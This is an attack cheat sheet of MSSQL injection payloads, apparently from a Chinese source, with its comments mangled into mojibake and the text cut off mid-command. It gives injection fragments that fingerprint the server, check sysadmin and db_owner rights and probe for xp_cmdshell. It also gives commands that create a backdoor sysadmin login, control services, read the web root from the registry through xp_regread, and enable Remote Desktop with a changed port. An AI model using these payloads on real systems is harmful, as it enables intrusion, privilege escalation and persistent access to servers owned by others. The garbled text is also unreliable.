sql×¢Èë³£ÓÃÓï¾ä

and exists (select * from sysobjects) //ÅжÏÊÇ·ñÊÇMSSQL and exists(select * from tableName) //ÅжÏij±íÊÇ·ñ´æÔÚ..tableNameΪ±íÃû and 1=(select @@VERSION) //MSSQL°æ±¾ And 1=(select db_name()) //µ±Ç°Êý¾Ý¿âÃû and 1=(select @@servername) //±¾µØ·þÎñÃû and 1=(select IS_SRVROLEMEMBER('sysadmin')) //ÅжÏÊÇ·ñÊÇϵͳ¹ÜÀíÔ± and 1=(Select IS_MEMBER('db_owner')) //ÅжÏÊÇ·ñÊÇ¿âȨÏÞ and 1= (Select HAS_DBACCESS('master')) //ÅжÏÊÇ·ñÓпâ¶ÁȡȨÏÞ and 1=(select name from master.dbo.sysdatabases where dbid=1) //±©¿âÃûDBIDΪ1£¬2£¬3.... ;declare @d int //ÊÇ·ñÖ§³Ö¶àÐÐ and 1=(Select count(*) from master.dbo.sysobjects Where xtype = 'X' AND name = 'xp_cmdshell') //ÅжÏXP_CMDSHELLÊÇ·ñ´æÔÚ and 1=(select count(*) from master.dbo.sysobjects where name= 'xp_regread') //²é¿´XP_regreadÀ©Õ¹´æ´¢¹ý³ÌÊDz»ÊÇÒѾ­±»É¾³ý Ìí¼ÓºÍɾ³ýÒ»¸öSAȨÏÞµÄÓû§test£º£¨ÐèÒªSAȨÏÞ£©
exec master.dbo.sp_addlogin test,password
exec master.dbo.sp_addsrvrolemember test,sysadmin Í£µô»ò¼¤»îij¸ö·þÎñ¡£ £¨ÐèÒªSAȨÏÞ£©
exec master..xp_servicecontrol 'stop','schedule'
exec master..xp_servicecontrol 'start','schedule' ±©ÍøվĿ¼
create table labeng(lala nvarchar(255), id int) DECLARE @result varchar(255) EXEC master.dbo.xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\ControlSet001\Services\W3SVC\Parameters\Virtual Roots','/',@result output insert into labeng(lala) values(@result); and 1=(select top 1 lala from labeng) »òÕßand 1=(select count(*) from labeng where lala>1)
—————————————————————————————————————————————————————·Ö¸î DOSÏ¿ª3389 ²¢Ð޸Ķ˿ںÅ
sc config termservice start= auto net start termservice //ÔÊÐíÍâÁ¬
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentCo